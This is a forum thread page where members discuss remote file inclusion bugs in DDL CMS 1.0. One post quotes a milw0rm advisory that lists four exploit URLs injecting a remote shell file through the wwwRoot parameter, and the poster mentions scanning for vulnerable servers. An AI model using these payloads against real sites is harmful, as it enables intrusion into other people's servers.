Activity Stream
48,167 MEMBERS
64642 ONLINE
besthostingforums On YouTube Subscribe to our Newsletter besthostingforums On Twitter besthostingforums On Facebook besthostingforums On facebook groups

Results 1 to 10 of 70

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1.     
    #1
    (╯?□?)╯︵ ┻━┻
    Website's:
    Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.com
    I love it when I get quoted so many times.

    I posted here saying it contains exploits, because it does.

    As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.
    JmZ Reviewed by JmZ on . DDLCMS question? I saw before that DDLCMS was still very buggy doesn't anyone know if the bug list has shortened? Thanks! Rating: 5

  2.   Sponsored Links

  3.     
    #2
    Member
    Website's:
    zomgbbqpizza.com evilddl.com scenemarket.org
    Quote Originally Posted by JmZ View Post
    I love it when I get quoted so many times.

    I posted here saying it contains exploits, because it does.

    As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.
    That makes sence but are there any servers that actually have that setting on??

    I don't like the way it is using a number to count the path (or however it works), and even worse that it is hardcoded.. it seems like a strange method.

    But back to that exploit here it is:
    Code: 
    +============================================================+
    |                                                            |
    | DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
    |                                                            |
    +============================================================+
    |                                                            |
    | Author : HxH                                               |
    |                                                            |
    | E-Mail : HxH[at]live[dot]at                                |
    |                                                            |
    +------------------------------------------------------------+
    |                                                            |
    | Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
    |                                                            |
    +------------------------------------------------------------+
    |                                                            |
    | Exploit :                                                  |
    |                                                            |
    | /header.php?wwwRoot=[Shell.txt?]                           |
    |                                                            |
    | /submit.php?wwwRoot=[Shell.txt?]                           |
    |                                                            |
    | /submitted.php?wwwRoot=[Shell.txt?]                        |
    |                                                            |
    | /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
    |                                                            |
    +============================================================+
    |                                                            |
    | Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
    |                                                            |
    +============================================================+
    
    # milw0rm.com [2009-09-21]
    But i tried to find any servers running ddl cms with this setting on (for testing purposes not malicious) and couldn't find one.

    Seriously though if we all work together and try and fix any problems the script will be great.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Help with DDLCMS
    By Darkstar in forum Forum and DDL Discussion
    Replies: 11
    Last Post: 23rd May 2011, 07:54 AM
  2. DDLCMS 3.2 help
    By FuBu in forum Forum and DDL Discussion
    Replies: 2
    Last Post: 16th Apr 2011, 02:52 PM
  3. help with ddlcms!
    By cyber-cliff in forum Technical Help Desk Support
    Replies: 5
    Last Post: 18th Feb 2011, 04:14 PM
  4. DDLCMS Someone help?
    By lonerunner in forum Forum and DDL Discussion
    Replies: 18
    Last Post: 18th Nov 2009, 01:20 AM

Tags for this Thread

BE SOCIAL